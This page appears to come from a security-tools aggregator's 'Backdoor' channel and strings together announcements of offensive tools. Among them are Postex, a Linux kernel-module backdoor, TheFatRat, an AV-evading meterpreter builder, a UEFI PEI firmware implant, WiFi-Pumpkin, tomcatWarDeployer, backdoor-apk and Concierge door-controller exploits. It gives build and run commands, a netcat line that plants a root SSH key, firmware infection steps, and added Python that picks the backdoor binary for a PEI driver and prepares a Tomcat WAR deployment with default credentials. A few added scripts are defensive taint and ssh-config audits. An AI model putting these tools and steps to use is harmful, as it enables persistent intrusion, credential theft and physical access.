Channel: Backdoor – Security List Network™

Postex is a Linux post exploitation tool for discovery, backdooring, and lateral movement.


goals
+ run independently of the host environment (no dependence on executable utilities already present on the host, e.g. python, ruby, find)
+ run with minimal likelihood of detection (no execution of potentially detectable commands, e.g. netstat, lsof, who)
+ run fast (parallelized native code)

discovery
+ grab a snapshot of host activity: processes, network connections, ARP cache, logged-in users, and more
+ … do the above over a period of time to get a sense of how the machine is used and by whom
+ detect security controls: A/V and auditd rules
+ grab ssh keys
+ serialize discovery data as JSON for easy consumption later

backdoor
+ modify user’s ssh config to force user to enable connection sharing (ControlMaster) when ssh’ing to remote hosts
features
– add user to the system
– add ssh pubkey to the root user
– execute userspace commands
– extensible…

antiforensics
+ encrypted payload functions
— when the backdoor is at rest (not performing an operation), the interesting pieces of the payload are encrypted in memory. Each command is handled as receive -> decrypt -> execute -> re-encrypt. The control channel supports OTP-style rekeying: each command sent to the backdoor may carry a new key. The need to re-encrypt with a new key goes away once Diffie-Hellman key exchange is implemented.
— this feature isn't useful for an open-source backdoor… um, ok. Did I mention extensibility?
+ userspace command execution isn’t picked up by auditd or traditional kprobing
I’m debating whether to write a LiME memory dump modifier to tamper with accurate memory dumps. Maybe too devious.

howtodetect
+ you'll have a tainted kernel if the kernel is configured to "allow signed modules, but not require them" (CONFIG_MODULE_SIG without CONFIG_MODULE_SIG_FORCE): loading the unsigned backdoor module sets the E ("unsigned module loaded") taint flag
+ all legitimate kernel modules will need to be signed for an unsigned module to stand out
— you still need to safely get the fact that the kernel is tainted off the system somehow
— the kernel can be tainted for reasons other than unsigned module loading, so pay attention to the taint code
+ volatility can show you there's a netfilter hook in place; you probably aren't expecting any, so this is usually high signal
— you can then reverse this piece of the module, but shouldn't be able to analyze the payload without the key
— unless something like Diffie-Hellman is used for key exchange, you can capture the key over the network to decrypt the payload
+ so it still means you need a memory dump and a pcap to analyze the payload
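Reading the taint code is the cheap host-side test in the list above, and the per-module flags are worth reading alongside the global mask. The script below is an added example written for this page, not part of Postex: it decodes /proc/sys/kernel/tainted with the bit table from the kernel's tainted-kernels documentation and lists modules whose /sys/module/<name>/taint shows an unsigned (E) or out-of-tree (O) load. The sample values used in the comments are constructed; the paths and the flag letters are the kernel's own.

```python
from __future__ import annotations

import os
from typing import Optional

# Taint bit -> (letter, meaning), after Documentation/admin-guide/tainted-kernels.rst.
# The letters are the ones the kernel prints in the "Tainted:" field of an oops.
TAINT_BITS = {
    0: ("P", "proprietary (non-GPL) module loaded"),
    1: ("F", "module was force-loaded"),
    2: ("S", "kernel running on an out-of-specification system"),
    3: ("R", "module was force-unloaded"),
    4: ("M", "processor reported a machine check exception"),
    5: ("B", "bad page referenced or unexpected page flags"),
    6: ("U", "taint requested by userspace"),
    7: ("D", "kernel died recently (OOPS or BUG)"),
    8: ("A", "ACPI table overridden by user"),
    9: ("W", "kernel issued a warning"),
    10: ("C", "staging driver loaded"),
    11: ("I", "workaround for a firmware bug applied"),
    12: ("O", "out-of-tree module loaded"),
    13: ("E", "unsigned module loaded"),
    14: ("L", "soft lockup occurred"),
    15: ("K", "kernel has been live-patched"),
    16: ("X", "auxiliary taint, defined by the distribution"),
    17: ("T", "kernel built with the struct randomization plugin"),
}

# The flags that say something about how a module got into the kernel.
MODULE_FLAGS = {"P", "F", "O", "E"}


def decode_taint(value: int) -> list[str]:
    """Return the flag letters set in a taint bitmask, lowest bit first.
    Constructed example: 12288 (bits 12 and 13) decodes to ['O', 'E']."""
    return [letter for bit, (letter, _) in sorted(TAINT_BITS.items()) if value & (1 << bit)]


def describe_taint(value: int) -> list[str]:
    """Human-readable form of decode_taint(), for a report that leaves the host."""
    return [f"{letter}: {meaning}" for bit, (letter, meaning) in sorted(TAINT_BITS.items())
            if value & (1 << bit)]


def module_loading_taints(value: int) -> list[str]:
    """Keep only the bits that point at module loading (P, F, O, E); a W or D taint
    left by an unrelated warning or oops is noise for this check."""
    return [flag for flag in decode_taint(value) if flag in MODULE_FLAGS]


def suspicious_modules(module_taints: dict[str, str]) -> dict[str, str]:
    """module_taints maps module name -> letters read from /sys/module/<name>/taint.
    Returns the modules loaded unsigned (E) or out-of-tree (O); on a host where every
    legitimate module is in-tree and signed this should come back empty."""
    return {name: flags for name, flags in module_taints.items() if set(flags) & {"E", "O"}}


def read_host_taint(path: str = "/proc/sys/kernel/tainted") -> Optional[int]:
    """Read the global taint mask; None where the file is unavailable (non-Linux)."""
    try:
        with open(path) as f:
            return int(f.read().strip())
    except (OSError, ValueError):
        return None


def read_module_taints(sysfs: str = "/sys/module") -> dict[str, str]:
    """Collect the per-module taint letters from /sys/module/<name>/taint
    (kernels that do not expose the attribute simply yield an empty dict)."""
    found: dict[str, str] = {}
    try:
        names = os.listdir(sysfs)
    except OSError:
        return found
    for name in names:
        try:
            with open(os.path.join(sysfs, name, "taint")) as f:
                flags = f.read().strip()
        except OSError:
            continue
        if flags:
            found[name] = flags
    return found


if __name__ == "__main__":
    taint = read_host_taint()
    if taint is None:
        print("no /proc/sys/kernel/tainted on this system")
    else:
        print(f"tainted={taint} flags={''.join(decode_taint(taint)) or '-'}")
        for line in describe_taint(taint):
            print("  " + line)
    for name, flags in sorted(suspicious_modules(read_module_taints()).items()):
        print(f"module {name}: {flags}")
```

Run it from something you trust rather than only from a shell on the suspect host: a module that wants to hide can rewrite what /proc and /sys report, so the same bits should be confirmed from the memory dump. Note also that with CONFIG_MODULE_SIG_FORCE the unsigned module is refused outright and nothing is tainted, which is the actual fix rather than a detection.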

lateral movement
+ piggyback on forwarded ssh credentials (ssh-agent reuse)
+ piggyback on existing ssh connections that have connection sharing enabled (ssh connection reuse)
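Both lateral-movement paths ride on the victim's own OpenSSH client configuration, which is also where the backdoor plants its ControlMaster change. The audit script below is an added example for this page, not Postex code: it parses an ssh_config-style file, reports every block that enables connection sharing with a real ControlPath (ControlMaster yes/auto/ask/autoask) or sets ForwardAgent yes, and turns the ControlPath template into a glob for finding live control sockets. The embedded sample config is constructed, and its "Host *" stanza is an assumption about what a planted stanza looks like; the page does not show Postex's exact edit.

```python
from __future__ import annotations

import os
import re

# ControlMaster values that turn multiplexing on; "no" is the default.
MUX_ON = {"auto", "yes", "ask", "autoask"}

# Constructed sample of a user's ~/.ssh/config. The "Host *" stanza is an assumption
# about what a planted connection-sharing block looks like.
SAMPLE_CONFIG = """\
# ~/.ssh/config (constructed sample)
ForwardAgent yes

Host bastion
    HostName bastion.example.internal
    User ops

Host *
    ControlMaster auto
    ControlPath ~/.ssh/cm-%r@%h:%p
    ControlPersist 10m
"""


def parse_ssh_config(text: str) -> list[tuple[str, dict[str, str]]]:
    """Return [(block_label, {keyword: value})] in file order.

    Keywords are case-insensitive and may be written "Key value" or "Key=value".
    Directives before the first Host/Match line land in a block labelled "(global)".
    Within a block the first value for a keyword wins, as in ssh_config(5)."""
    blocks: list[tuple[str, dict[str, str]]] = [("(global)", {})]
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        if len(parts) != 2:
            continue
        key, value = parts[0].lower(), parts[1].strip()
        if key in ("host", "match"):
            blocks.append((value, {}))
        else:
            blocks[-1][1].setdefault(key, value)
    return blocks


def control_socket_glob(control_path: str) -> str:
    """Turn a ControlPath template (%r, %h, %p, %C, ...) into a glob that finds the
    live control sockets an attacker could ride, e.g. ~/.ssh/cm-*@*:*."""
    return re.sub(r"%.", "*", os.path.expanduser(control_path))


def audit(text: str) -> list[str]:
    """Flag every block that enables connection sharing with a real ControlPath,
    and every block that forwards the agent. ControlMaster without a ControlPath
    (or with ControlPath none) creates no socket and is not reported."""
    findings = []
    for label, opts in parse_ssh_config(text):
        master = opts.get("controlmaster", "no").lower()
        path = opts.get("controlpath", "none")
        if master in MUX_ON and path.lower() != "none":
            persist = opts.get("controlpersist", "no")
            findings.append(f"{label}: ControlMaster {master} via ControlPath {path} "
                            f"(ControlPersist {persist})")
        if opts.get("forwardagent", "no").lower() == "yes":
            findings.append(f"{label}: ForwardAgent yes")
    return findings


if __name__ == "__main__":
    import glob
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else os.path.expanduser("~/.ssh/config")
    try:
        with open(target) as f:
            text = f.read()
    except OSError:
        text = SAMPLE_CONFIG
        print(f"{target} not readable, auditing the constructed sample instead")
    for finding in audit(text):
        print(finding)
    for _, opts in parse_ssh_config(text):
        if "controlpath" in opts:
            for sock in glob.glob(control_socket_glob(opts["controlpath"])):
                print(f"live control socket: {sock}")
```

The script reports per block; to see which values actually apply to one destination after ssh's first-match rule, run ssh -G host, which prints the effective configuration. The larger caveat is that nothing here fires on the reuse itself: a session riding an existing multiplexed connection or a forwarded agent looks like the user's own traffic to the destination, so the control is to keep ControlMaster off unless needed, keep ControlPersist short, and avoid ForwardAgent toward hosts you do not trust.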

use and download:

git clone https://github.com/unixist/postex && cd postex
cd discovery
go build
cd cmd
go run snappy.go --av | jq '.[] | select(.Name == "Antivirus")|.Values[].Name'
"OSSEC"
"Sophos"
"Tripwire"
"Samhain"


Backdoor:
cd persistence
make
then load the built .ko kernel module(s) and add a public key to the root user's /root/.ssh/authorized_keys file:
$ echo 'key:0124812401:1111111111:2' | nc -u $host 8001

Source: https://github.com/unixist


TheFatRat – Backdoor Creator For Remote Access.


What is FatRat?
An easy tool for generating backdoors with msfvenom (part of the Metasploit Framework). It compiles a C program with an embedded meterpreter reverse_tcp payload that can then be executed on a Windows host; according to the project, the compiled binary bypasses most AV.
Automating metasploit functions:
+ Checks for the metasploit service and starts it if not running
+ Easily craft meterpreter reverse_tcp payloads for Windows, Linux, Android, Mac and others
+ Start multiple meterpreter reverse_tcp listeners
+ Fast search in searchsploit
+ Bypass AV
+ Drop into msfconsole
+ Some other fun stuff

Dependencies:
+ Metasploit Framework
+ MinGW
This tool has been tested on Kali Linux 2.0 & Rolling 2016.1

Download & Usage:

git clone https://github.com/Screetsec/TheFatRat.git && cd TheFatRat
chmod +x fatrat
chmod +x powerfull.sh
./fatrat

Source: https://github.com/Screetsec

TheFatRat v1.2 codename:xenogenesis – Backdoor Creator For Remote Access.


Changelog v1.2:
* FUD BACKDOOR WITH AVOID 1.2 added.
++ METASPLOIT SHELL A.V. FOR BYPASS AV VERSION 2.1


Download & Usage:

git clone https://github.com/Screetsec/TheFatRat.git && cd TheFatRat
chmod +x fatrat
chmod +x powerfull.sh
./fatrat

Note From Us:
Before updating with git pull origin master, remove the old fatrat and powerfull.sh first: rm -f fatrat powerfull.sh
then run:
git pull origin master

Source: https://github.com/Screetsec | Our Post Before

PEI stage backdoor for UEFI compatible firmware.


This project implements an early stage firmware backdoor for UEFI based firmware. It allows arbitrary code written in C to execute during the Pre EFI Initialization (PEI) phase of Platform Initialization (PI). The backdoor is useful for low level manipulation of the target platform configuration at a point when most of the platform configuration registers are not locked yet.

The PEI backdoor project includes:
+ PeiBackdoor.py – Python program that infects raw flash images or individual UEFI PEI drivers with the backdoor code.
+ PeiBackdoor_IA32.efi, PeiBackdoor_IA32.pdb – 32-bit PEI backdoor binary compiled with ACTIVE_PLATFORM = IA32.
+ PeiBackdoor_X64.efi, PeiBackdoor_X64.pdb – 64-bit PEI backdoor binary compiled with ACTIVE_PLATFORM = X64.
+ PeiBackdoor.inf – PEI backdoor project configuration for the EDK2 build environment.
+ config.h – PEI backdoor build options.
+ payload.c – Put your own PEI stage code into this source file and call it from the Payload() function.
+ src/ – Rest of the PEI backdoor code.
PeiBackdoor.py uses the Capstone engine and pefile Python libraries; install them with pip install capstone pefile.

PeiBackdoor.py program to deploy PEI backdoor

Possible applied use cases:
* Edit values of REMAPBASE, REMAPLIMIT and other host controller registers during RAM initialization to perform a UMA remap attack on Intel Management Engine RAM.
* Lock the TSEGMB host controller register with a junk value to make System Management Mode code vulnerable to DMA attacks.
* Do other evil things that require hijacking early stage platform initialization code.

To build the PeiBackdoor project you need a Windows machine with Visual Studio 2008 and the EDK2 https://github.com/tianocore/edk2 source code.
Step by step instructions:
1. Run the Visual Studio 2008 Command Prompt and cd to the EDK2 directory.
2. Execute Edk2Setup.bat --pull to configure the build environment and download the required binaries.
3. Execute git clone git://github.com/Cr4sh/PeiBackdoor.git.
4. Edit Conf/target.txt and set ACTIVE_PLATFORM to OvmfPkg/OvmfPkgX64.dsc for a 64-bit build or to OvmfPkg/OvmfPkgIa32.dsc for a 32-bit build. Also set TARGET_ARCH to X64 for a 64-bit build or to IA32 for a 32-bit build.
5. Edit OvmfPkg/OvmfPkgX64.dsc (OvmfPkg/OvmfPkgIa32.dsc for a 32-bit build) and add the PeiBackdoor/PeiBackdoor.inf path at the end of the [Components] section.
6. cd PeiBackdoor && build
7. After compilation the resulting PE image is created at Build/OvmfX64/DEBUG_VS2008x86/X64/PeiBackdoor/PeiBackdoor/OUTPUT/PeiBackdoor.efi for a 64-bit build or at Build/OvmfIa32/DEBUG_VS2008x86/IA32/PeiBackdoor/PeiBackdoor/OUTPUT/PeiBackdoor.efi for a 32-bit build (the output directory is set by the OVMF .dsc chosen in step 4).

Running on real hardware
To run PeiBackdoor.efi on your physical machine you need to obtain the image of an existing PEI driver:
1. Dump the motherboard firmware using a hardware SPI programmer.
2. Open the dumped flash image in UEFITool and extract the PE/TE image of the existing PEI driver that you want to infect with the PEI backdoor:

…and infect it using PeiBackdoor.py:
1. Infect the extracted PE or TE image with PeiBackdoor_IA32.efi or PeiBackdoor_X64.efi depending on its architecture: python PeiBackdoor.py -d image.efi -o image_patched.efi -p PeiBackdoor_X64.efi
2. Use UEFITool to replace the original PE image with image_patched.efi, save the modified flash image into a file and write it to the motherboard ROM with the programmer.
Usage and Download from git:

git clone https://github.com/Cr4sh/PeiBackdoor && cd PeiBackdoor
python PeiBackdoor.py -f flash.bin -p PeiBackdoor_IA32.efi -o flash_patched.bin
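The infect step asks you to pick the IA32 or X64 backdoor binary to match the driver you extracted. The helper below is an added example for this page, not part of PeiBackdoor.py (which relies on pefile and Capstone): it reads the Machine field from either a PE header (via e_lfanew) or a TE header, where the PI specification's Terse Executable format drops the DOS/NT headers and puts Machine directly after the 'VZ' signature, and returns the matching binary name. The two image builders only produce header-sized byte strings for the test; they are constructed, not real PEI drivers.

```python
from __future__ import annotations

import struct

IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_FILE_MACHINE_X64 = 0x8664

# Which shipped backdoor binary goes with which COFF machine type.
MACHINE_TO_BACKDOOR = {
    IMAGE_FILE_MACHINE_I386: "PeiBackdoor_IA32.efi",
    IMAGE_FILE_MACHINE_X64: "PeiBackdoor_X64.efi",
}


def image_machine(data: bytes) -> tuple[str, int]:
    """Return (format, machine) for a PE ('MZ' ... 'PE\\0\\0') or TE ('VZ') image.

    TE (EFI_TE_IMAGE_HEADER, PI spec vol. 1) is a stripped PE: the 2-byte 'VZ'
    signature is followed directly by the 16-bit Machine field. A full PE keeps
    Machine at offset 4 of the NT headers, located via e_lfanew at DOS offset 0x3C."""
    if data[:2] == b"VZ":
        if len(data) < 4:
            raise ValueError("truncated TE header")
        return "TE", struct.unpack_from("<H", data, 2)[0]
    if data[:2] == b"MZ":
        if len(data) < 0x40:
            raise ValueError("truncated DOS header")
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        if e_lfanew + 6 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
            raise ValueError("bad or out-of-range PE signature")
        return "PE", struct.unpack_from("<H", data, e_lfanew + 4)[0]
    raise ValueError("neither PE nor TE image")


def backdoor_for(data: bytes) -> str:
    """Name of the PeiBackdoor binary matching the driver's architecture."""
    fmt, machine = image_machine(data)
    try:
        return MACHINE_TO_BACKDOOR[machine]
    except KeyError:
        raise ValueError(f"{fmt} image with unsupported machine 0x{machine:04x}") from None


def make_te(machine: int) -> bytes:
    """Constructed header-only TE image: Signature, Machine, NumberOfSections,
    Subsystem, StrippedSize, AddressOfEntryPoint, BaseOfCode, ImageBase,
    DataDirectory[2]. Only Signature and Machine matter to image_machine()."""
    return b"VZ" + struct.pack("<HBBHIIQ", machine, 1, 0x0B, 0, 0, 0, 0) + b"\0" * 16


def make_pe(machine: int) -> bytes:
    """Constructed header-only PE image: 64-byte DOS header whose e_lfanew points
    at a 'PE\\0\\0' signature plus a 20-byte COFF file header carrying Machine."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    coff = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, 0, 0)
    return bytes(dos) + b"PE\0\0" + coff


if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        with open(path, "rb") as f:
            blob = f.read()
        fmt, machine = image_machine(blob)
        print(f"{path}: {fmt} machine=0x{machine:04x} -> {backdoor_for(blob)}")
```

UEFITool already tells you whether the extracted section is PE32 or TE; what the check adds is an explicit architecture match before patching, since a backdoor built for the other architecture cannot execute from the driver it is spliced into.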

Source: http://blog.cr4.sh/ | https://github.com/Cr4sh

TheFatRat v1.5 codename: Unity – Backdoor Creator For Remote Access.


Changelog TheFatRat v1.5:
– Add PE file for example
– Add feature: embed backdoor with backdoor-factory
– Recoded function cmsfvenom
– Add some variables ( pwd, Version, Codename )
– Added script function gboor ( checks if your command is correct )
– Added script function spinner for random seed generator from avoid
– Added script function spinner metasploit generator from avoid
– Added autorun script when creating a listener
– Remove cd "output"
– Change the script output when msfvenom creates
– Change name ( optional ) of output when you create a backdoor
– Added script for cleaning


Download & Usage:

apt-get install mingw32 (install requirement)
git clone https://github.com/Screetsec/TheFatRat.git && cd TheFatRat
chmod +x fatrat
chmod +x powerfull.sh
./fatrat


Source: https://github.com/Screetsec | Our Post Before

WiFi-Pumpkin v0.8.1 – Framework for Rogue Wi-Fi Access Point Attack.


Changelog Wifi-Pumpkin v0.8.1:
——————————————–
– re-design all GUI Menu->view
– added new report logger GUI
– added new sessions for Rogue AP loggers
– added new plugin BDFProxy-ng
– added new theme Orange and set as default
– fixed error when launch airodump-ng scan the wireless networks #75
– fixed IndexError: list index out of range on BDFProxy get_output #77
– added new re-design module Deauth Wireless Attack
– added some improvements in module Probe Wireless Request #78
– added option: exclude USB Wi-Fi Adapter in NetworkManager persistently #69

Wifi-Pumpkin Updater: click the Help menu, then Update

WiFi-Pumpkin is a security tool that provides a rogue access point for man-in-the-middle and network attacks: it purports to offer wireless Internet service while snooping on the traffic. It can be used to capture the credentials of unsuspecting users, either by sniffing their communication or by phishing.
Features
+ Rogue Wi-Fi Access Point
+ Deauth clients from an AP
+ Probe Request Monitor
+ DHCP Starvation Attack
+ Credentials Monitor
+ Windows Update Attack
+ Phishing templates
+ Partial HSTS bypass
+ Dump phished credentials
+ Support for airodump scan
+ Support for mdk3 deauth
+ BeEF hook support
+ HTML report logs
+ MAC Changer
+ ARP Poison
+ DNS Spoof

Ubuntu/Kali 2.0/WifiSlax 4.11.1/Parrot 2.0.5:

git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git
cd WiFi-Pumpkin
chmod +x installer.sh
./installer.sh --install


Update
cd WiFi-Pumpkin
git pull origin master

then run
wifipumpkin (ubuntu)
wifi-pumpkin (kali 2.0)

Source : https://github.com/P0cL4bs | Download: 0.8.1.zip | 0.8.1.tar.gz | Our post before

tomcatWarDeployer v0.3.3 – Apache Tomcat auto WAR deployment & pwning penetration testing tool.


Changelog 12.09.16 TomcatWarDeployer Version 0.3.3:
+ Added support for Tomcat 5 interface.


tomcatWarDeployer is an Apache Tomcat auto WAR deployment & pwning penetration testing tool.
What is it?
This is a penetration testing tool intended to leverage Apache Tomcat credentials in order to automatically generate and deploy a JSP backdoor, invoke it afterwards and provide a shell (either via a web GUI, a listening port bound on the remote machine, or a reverse TCP payload connecting back to the adversary).
In practice, it generates a JSP backdoor WAR package on the fly and deploys it through the Apache Tomcat Manager application, using valid HTTP authentication credentials that the pentester provided (or custom ones; in the end, we all love tomcat:tomcat).
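To make the deployment step concrete, the example below builds a minimal WAR in memory and prepares the Tomcat Manager request that installs it. It is an added example for this page, not tomcatWarDeployer's code: the JSP inside only echoes JVM properties in place of the tool's shell, the host, context path and tomcat:tomcat credentials are constructed placeholders, and the request is built but not sent.

```python
from __future__ import annotations

import base64
import io
import urllib.parse
import urllib.request
import zipfile

WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="3.1">
  <welcome-file-list><welcome-file>index.jsp</welcome-file></welcome-file-list>
</web-app>
"""

# Stand-in for the tool's JSP shell: it only proves server-side execution by
# echoing JVM properties, so the example stays harmless on a lab instance.
INDEX_JSP = """<%@ page contentType="text/plain" %><%
    out.println("java.version=" + System.getProperty("java.version"));
    out.println("os.name=" + System.getProperty("os.name"));
    out.println("user.name=" + System.getProperty("user.name"));
%>"""


def build_war(jsp_name: str = "index.jsp", jsp_body: str = INDEX_JSP) -> bytes:
    """Return a WAR (a zip) holding WEB-INF/web.xml and one JSP at the context root."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr("WEB-INF/web.xml", WEB_XML)
        war.writestr(jsp_name, jsp_body)
    return buf.getvalue()


def war_members(war: bytes) -> list[str]:
    """Sorted member names of a WAR, for checking what build_war() produced."""
    with zipfile.ZipFile(io.BytesIO(war)) as z:
        return sorted(z.namelist())


def deploy_request(base_url: str, context: str, war: bytes,
                   username: str, password: str, update: bool = True) -> urllib.request.Request:
    """Prepare (without sending) the Manager text-interface deploy call:
        PUT <base>/manager/text/deploy?path=<context>&update=true   body = WAR bytes
    Tomcat 7 and later serve it under /manager/text and require the manager-script
    role; manager-gui alone is refused. Tomcat 5/6 expose the call at /manager/deploy."""
    query = urllib.parse.urlencode({"path": context, "update": "true" if update else "false"})
    url = f"{base_url.rstrip('/')}/manager/text/deploy?{query}"
    req = urllib.request.Request(url, data=war, method="PUT")
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    req.add_header("Authorization", f"Basic {token}")
    req.add_header("Content-Type", "application/octet-stream")
    return req


def invoke_url(base_url: str, context: str, jsp_name: str = "index.jsp") -> str:
    """Where the deployed JSP answers once Tomcat reports 'OK - Deployed application'."""
    return f"{base_url.rstrip('/')}{context}/{jsp_name}"


if __name__ == "__main__":
    # Constructed placeholders: lab host, the default tomcat:tomcat pair, context /probe.
    base, creds = "http://127.0.0.1:8080", ("tomcat", "tomcat")
    war = build_war()
    req = deploy_request(base, "/probe", war, *creds)
    print(req.get_method(), req.full_url, f"({len(war)} byte WAR)")
    print("then GET", invoke_url(base, "/probe"))
    # Against a lab instance you control, send it with:
    #   with urllib.request.urlopen(req) as resp: print(resp.read().decode())
```

Two details decide whether this works on a real target: the text interface lives at /manager/text/deploy on Tomcat 7 and later (Tomcat 5/6 use /manager/deploy), and the account needs the manager-script role, since manager-gui alone gets a 403. On the defensive side, a PUT to /manager/text/deploy followed by the first GET of a context nobody deployed through change management is the access-log pattern to alert on.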

TODO
+ Implement sort of communication authentication and encryption/encoding, to prevent flow of plain-text data through the wire/ether
+ Test it on tomcat8

Usage:

git clone https://github.com/mgeeky/tomcatWarDeployer && cd tomcatWarDeployer
python tomcatWarDeployer.py -h

Update:
git pull origin master

Source: https://github.com/mgeeky | Our Post Before

Notice:
Usage of tomcatWarDeployer for attacking infrastructures without prior mutual consent can be considered an illegal activity. It is the final user's responsibility to obey all applicable local, state and federal laws. The authors assume no liability and are not responsible for any misuse or damage caused by this program.

TheFatRat v1.6 codename: Tasty – Backdoor Creator For Remote Access.


Changelog TheFatRat v1.6 codename “Tasty” :
– Add new features create backdoor with PwnWinds ( FUD++ )
– Add some script for checking monodevelop and apache server
– Add new features backdooring original apk with metasploit
– Add setup.sh for configuration fatrat and install dependencies
– remove auto install bdf and mingw ( function checked )
– Add listener for android
– Add feature for cleanup all backdoor


Download & Usage:

apt-get install mingw32 (install requirement)
git clone https://github.com/Screetsec/TheFatRat.git && cd TheFatRat
chmod +x fatrat
chmod +x powerfull.sh
./fatrat


Source: https://github.com/Screetsec | Our Post Before


backdoor-apk v0.1.4 is a shell script that simplifies the process of adding a backdoor to any Android APK file.


Changelog backdoor-apk v0.1.4 (2016-09-20):
Improvements
* New UI enhancements allow selecting Android payloads and entering LHOST and LPORT values
* New ascii art is displayed on script execution
* First attempt at improving the readability of logging output
* Apktool is no longer provided as a third-party tool, backdoor-apk.sh now expects apktool to be properly setup on the system

Miscellaneous
* README and HISTORY file updates


backdoor-apk is a shell script that simplifies the process of adding a backdoor to any Android APK file. Users of this shell script should have working knowledge of Linux, Bash, Metasploit, Apktool, the Android SDK, smali, etc. This shell script is provided as-is without warranty of any kind and is intended for educational purposes only.


The recompiled APK will be found in the ‘original/dist’ directory. Install the APK on a compatible Android device, run it, and handle the meterpreter connection at the specified IP and port.
Usage:

git clone https://github.com/dana-at-cp/backdoor-apk && cd backdoor-apk
cd backdoor-apk
./backdoor-apk.sh [your apk file]

Update:
git pull origin master

Now you can deliver it using a MITM technique :-) (just for educational purposes, right? yeah.. let's rock)

Source: https://github.com/dana-at-cp | Our Post Before

Concierge – A collection (eventually) of Physical Access Control and Monitoring attacks and utilities.


Concierge is a collection (eventually) of Physical Access Control and Monitoring attacks and utilities. These will all eventually evolve into a more effective and user friendly set of tools, but for now, simple bash scripts do the job.

Dependencies:
+ Any Linux machine
+ Nmap
+ git

Main scripts:
* eh400.sh
Usage: ./eh400.sh <action>
Actions: exploit, cleanup
All necessary variables are entered during execution of the script.
exploit: Leverages a command injection vulnerability to:
+ Modify the .htpasswd file to a known password value for the "admin" user. This allows manual control via http(s).
+ Push a remote agent script to the EH400 (used by triggeragent.sh). This allows for control via the command line.
+ Pull the IdentDB badge store and /etc/shadow from the EH400.
+ Also check /etc/shadow for known default password values.
cleanup: Removes all copied or created files and restores the original htpasswd file.

* vertx.sh
Usage: ./vertx.sh <action>
Actions: exploit, cleanup
All necessary variables are entered during execution of the script.
exploit: Leverages a command injection vulnerability to:
+ Create a new user, 'z', with password 'backdoor', and grant web access privileges. This allows manual control via http(s).
+ Push a remote agent script to the VertX EVO (used by triggeragent.sh). This allows for control via the command line.
+ Pull the IdentDB badge store and /etc/passwd from the VertX EVO.
+ Also check /etc/passwd for known default password values.
cleanup: Removes all copied or created files and deletes the 'z' user.

* agentdeploy.sh
Usage: ./agentdeploy.sh <ip> <mac>
This script can be used for both EH400 and VertX EVO door controllers. It is a lighter weight script that only deploys the agent script for use with triggeragent.sh.

* triggeragent.sh
Usage: ./triggeragent.sh <ip> <mac> <action>
Actions: unlock, lock, blink
Example: ./triggeragent.sh 10.1.1.10 00:11:22:33:44:55 unlock
Leverages a previously deployed agent script to lock/unlock a door controller's associated locking mechanism or blink the LEDs on the associated reader. Further testing against the V1000 is required.
'blink' flashes the LED lights on an associated RFID reader. Used to help locate the exploited door. This has only been tested on HID iClass (and similar) readers, but should work on any reader with external LEDs.

* agentclean.sh
Usage: ./agentclean.sh <ip> <mac>
Removes the agent script from the targeted door controller. Used to clean up after agentdeploy.sh and triggeragent.sh. If you've used eh400.sh or vertx.sh to exploit the targets, use them again with the cleanup action.

* massdeploy.sh
Usage: ./massdeploy.sh <attacker ip>
Example: ./massdeploy.sh 10.0.0.1 10.1.1.0/24
All targets must be provided in nmap-acceptable format. Currently, input files are not accepted. This script simply automates finding door controllers and deploying agents.

* massclean.sh
Usage: ./massclean.sh <target(s)>
Example: ./massclean.sh 10.10.0.1/24

* hid-discoveryd-enum.nse
Usage: nmap -sU -p 4070 --script hid-discoveryd-enum <target(s)>
Simple nmap script that leverages the functionality of the discoveryd service to identify HID EVO door controllers and enumerate system information. This NSE script is located in the tools directory; simply copy it to nmap's script directory.

Notes
Testing of these scripts was completed against three separate HID door controllers:
+ Edge EVO EH400
+ VertX EVO V2000
+ VertX EVO V1000
A wiki will be on the way shortly to provide more thorough information.

Usage and Download:

git clone https://github.com/lixmk/Concierge && cd Concierge
now you can run the bash scripts one by one

Source: https://github.com/lixmk

Tools Updates : a Collection security and hacking tools; likes exploits, proof of concepts, shellcodes, scripts, and more.


Changelog v9/10/2016:
+ Scanner: Automated HTTP Enumeration v0.4 *New
+ Exploit: add freepbx exploit
+ Misc: Breakout Atari 2600 Homebrew (PAL only).

Automated HTTP Enumeration v0.4
Dnsspider : A very fast multithreaded bruteforcer of subdomains that leverages a wordlist and/or character permutation

This section offers a selection of our fully featured security and hacking tools from NullSecurity.
+ Automation :
This section includes automation tools and wrapper scripts for well-known and public security tools to make your life easier. You can adjust the scripts fast and easily according to your own needs. Mostly written in Bourne shell.
+ Backdoor :
Backdoors and rootkits for kernel and userland, network, hardware and software. Once you have gone through all the hard work of making sure you can get on the system, make sure you can always get back in.
+ Binary :
ELF and PE binary related tools. This section includes packers and runtime crypters, including our famous (thanks TrustedSec team) hyperion tool from our very own belial, and other stuff.
+ Cracker :
Tools for cracking network and software login masks. Not been able to find an exploit to give you RCE? Too lazy to SE? So go smash down the front doors and rummage around with our cracking and brute force tools.
+ Cryptography :
Encrypt all the things! With privacy issues moving up most people's agenda with items like PRISM in the news, cryptography is one of today's hot topics. It's also pretty useful for exfiltrating data from your target environment, connecting to that C2 box and keeping your loot away from prying eyes.
+ DDoS :
(D)DoS tools if you wanna be like those n00bs at Anonymous or simulate everyone's favourite underground extortionists.
+ Exploit :
Proof of Concept tools and, if we are feeling particularly generous, fully working exploits, because there is nothing more fun than RCE, except dinner with noptrix of course.
+ Fuzzer :
Didn't find the exploit you wanted in our exploit section? Well, try one of our fuzzers and write your own god damn code.
+ Keylogger :
When you really need to know those credentials you keep seeing the user enter, or are too lazy to go searching for every new piece of useful information, just try one of our keyloggers and get the user to do the hard work for you!
+ LogCleaner :
